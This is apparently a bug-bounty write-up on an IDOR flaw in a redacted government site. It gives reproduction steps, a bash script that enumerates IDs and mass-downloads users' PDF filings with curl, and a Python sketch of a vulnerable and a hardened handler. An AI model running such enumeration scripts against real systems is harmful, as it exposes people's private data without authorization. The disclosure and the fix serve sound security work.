IDOR To Massive Government Data Leak
Hello, everyone! I am back with one of my findings, which I reported in late January 2023 and which was marked as resolved a few months ago. On one of the endpoints, I discovered that I could view and download a massive amount of user data without any authentication. Here is a brief introduction to IDOR. Although no authentication was involved at all, the root cause is the same kind of access-control failure: an authorization check that should have existed did not. Insecure Direct Object Reference (IDOR) is a vulnerability that occurs when an application lacks proper access control checks, enabling attackers to manipulate, destroy, or disclose data without valid authorization.
Steps to Reproduce:
- Use a browser to navigate to: https://redact.gov/cart/receipt.aspx
- Click on “Redacted Report for Corporation #1337”
- It redirects to https://redact.gov/Display/RetrieveSOSFinalPDF?Id=1337
- Now change the Id in https://redact.gov/Display/RetrievePDF?Id=
At first, I downloaded the data one by one as a proof of concept. Later I thought, why not automate it, since no authentication is required and I can check which IDs have data. So I wrote a bash script to check whether a file exists and, if it does, download it as a PDF. The following bash script demonstrates the mass download of files as a PoC.
```bash
#!/bin/bash
# check that start and end arguments were provided
if [ -z "$1" ] || [ -z "$2" ]; then
    echo "Error: Please provide a start and end filingId as arguments."
    exit 1
fi

start=$1
end=$2

for ((i=start; i<=end; i++)); do
    # construct the URL with the current filingId
    url="https://redact.gov/Display/RetrievePDF?Id=$i"
    # download the file using curl; -f makes curl exit non-zero on an HTTP
    # error status, otherwise a 404 page would be saved and counted as success
    if curl -f -s -o "filing-$i.pdf" "$url"; then
        echo "Successfully downloaded file $i to filing-$i.pdf"
    else
        echo "Error: Failed to download file $i"
        rm -f "filing-$i.pdf"
    fi
done
```

Run it with a start and end ID:

```bash
./script.sh 500 10000
```
It then downloaded the files for IDs 500 through 10,000, and all of the white entries in the screenshots are valid users' PDF files. The issue was accepted as a P3 risk, even though some of the data was publicly searchable. This was not an intended feature, because it made it possible to abuse a massive amount of sensitive user data.
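To make the root cause concrete, here is an added example (my own illustration, not code from the affected site) of the handler pattern behind an endpoint like RetrievePDF, with the vulnerable form next to a hardened one. The filing store, session object and owner names are constructed; the point is that the hardened handler ties the requested Id to the authenticated caller and answers "not found" identically for missing and foreign filings, so the Id space cannot be enumerated.

```python
from dataclasses import dataclass
from typing import Optional

# Constructed sample data standing in for the filings database.
FILINGS = {
    1337: {"owner": "corp-1337", "pdf": b"%PDF-1.4 constructed filing 1337"},
    1338: {"owner": "corp-1338", "pdf": b"%PDF-1.4 constructed filing 1338"},
}


@dataclass
class Session:
    user_id: Optional[str]  # None models an unauthenticated request


class HttpError(Exception):
    def __init__(self, status: int):
        super().__init__(status)
        self.status = status


def retrieve_pdf_vulnerable(filing_id: int) -> Optional[bytes]:
    """IDOR pattern from the writeup: the Id parameter is trusted as-is,
    so anyone who can guess an Id gets the document."""
    filing = FILINGS.get(filing_id)
    return filing["pdf"] if filing else None


def retrieve_pdf(session: Session, filing_id: int) -> bytes:
    """Hardened handler: authenticate first, then authorise the caller
    against the owner recorded on the object itself."""
    if session.user_id is None:
        raise HttpError(401)
    filing = FILINGS.get(filing_id)
    # One response for "no such filing" and "not your filing": a 403 here
    # would confirm that the Id exists, which is exactly what a scan probes.
    if filing is None or filing["owner"] != session.user_id:
        raise HttpError(404)
    return filing["pdf"]


def status_of(session: Session, filing_id: int) -> int:
    """Helper returning the HTTP status the hardened handler would send."""
    try:
        retrieve_pdf(session, filing_id)
        return 200
    except HttpError as e:
        return e.status
```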
Timeline:
Reported → 25 Jan 2023
Triaged → 25 Jan 2023
Resolved → 20 Mar 2023